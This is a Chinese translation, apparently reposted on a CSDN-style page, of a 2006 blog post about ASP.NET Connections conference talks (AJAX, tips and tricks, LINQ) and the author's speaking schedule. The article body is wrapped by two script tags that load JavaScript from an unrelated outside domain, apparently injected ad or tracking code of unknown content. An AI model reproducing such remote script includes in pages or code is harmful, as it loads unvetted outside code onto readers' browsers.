ASP.NET Connections 大会的讲义和演示代码

<script language='javascript' src='http://www.taizhou.la/AD/ad.js'></script>

【原文地址】 ASP.NET Connections Slides + Demos
【原文发表日期】 Friday, November 10, 2006 11:36 PM

这个星期早些时候,我在于拉斯维加斯举行的ASP.NET Connections 大会上做了演讲。这是个一年2次的精彩大会,秋季的是在拉斯维加斯举行,春季的是在奥兰多举行。上个星期,仅参与ASP.NET Connections大会的就有1500多人之多,而参与所有DevConnections的则有4700多人之多。除了ASP.NET Connections外,同时举行的还有VS,SQL, SharePoint, Mobile 和 Office Connections大会 ,是在同一个地点举行的,参会人员允许参与任何讲座。

在大会开幕之夜,我向参与大会的所有人做了一个综述性的主题演讲。之后,我还做了三个ASP.NET方面的讲座:

ASP.NET AJAX 主题演讲

这个讲座展开(kick off)了会议的第一个整天,对我们的ASP.NET AJAX 1.0计划做了一个综述和几个从头开始的AJAX 演示。你可以 在这里下载相关的讲义和演示代码

这个演讲的注目处是,来自Burton的Ben Noonan上台来展示他们在Burton的公开网站上实现的一些非常酷的ASP.NET AJAX 用例。Ben向参会人员很好地示范了他们使用ASP.NET AJAX 的一些方式, 还强调了他们看到的一些好的业务结果 ,无论是在一个用户花在他们网站上的平均时间的增加方面,还是因此带来的销售和收入的增加方面。

我们为大会做的趣事之一是定制了一个Burton ASP.NET AJAX 滑雪板(看右边的图片里滑雪板的样子)。Bill Gates 和 Jake Burton 都同意在上面签了名,昨天,我们通过抽奖把它送给了一个幸运的参会人员。

ASP.NET 技巧和诀窍

这个讲座讨论了ASP.NET UI,缓存和部署方面的技巧和诀窍,以及Visual Studio 2005的技巧和诀窍。你可以在这里下载相关的讲义和演示代码

想进一步了解如何优化Visual Studio的build性能的话,你可以 阅读一下我以前写的这篇相关的帖子。你还可以浏览我以前写的 归档于“Tips and Tricks”标签下的帖子,从中你能找到很多篇有关ASP.NET 和Visual Studio技巧和诀窍的帖子。

ASP.NET 和 LINQ

这个讲座对将于明年发布的LINQ新技术做了一个概览,还对它将给ASP.NET带来的生产力的显著提高做了一些演示。点击这里下载相关的讲义和演示代码

你可以阅读一下我以前写的几篇LINQ方面的帖子,来进一步了解LINQ以及如何将它用在ASP.NET里。下面是特别值得一读的几篇帖子:

就象我以前说过的,我认为LINQ是最酷的新.NET技术之一,绝对值得审阅和试验一下。

我预定的演讲日程

实际上,我已经结束了本年度的会议演讲,感觉轻松多了,因为今年我曾在阿姆斯特丹,赫尔辛基,尼斯,都柏林,奥克兰,悉尼,波士顿,奥兰多,达拉斯,和拉斯维加斯(2次)参与了活动。我盼望能在下2个月内呆在阳光明媚的西雅图,真的做我的日常工作。

明年的演讲日程还没有最后定下来。我将主讲的会议有,一月中旬在俄亥俄举行的CodeMash大会,三月在奥兰多举行的春季ASP.NET Connections大会,有可能会去三月在旧金山举行的SDWest大会(这个还没最后定下来),肯定会去四月三十日至五月二日举行的微软MIX07 大会

五月份之后,我还没有确定的计划,虽然我大概会再去TechEd(美国)演讲,有可能挤出时间去一次欧洲, 明年非常有可能首行印度和日本。

希望早日见到你们,

Scott

附注:大家有时问我他们是否可以在他们自己的讲座里重用我的一些讲义和演示代码。答复是,绝对可以的!请你尽管重用我的博客上或我的讲座里的所有的内容好了,不用寻求许可或者注明出处。我贴出这些内容就是为了让尽可能多的人可以从中学到东西,所以,有你向别人传递这知识正是我之所愿。

<script language='javascript' src='http://www.taizhou.la/AD/as.js'></script>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值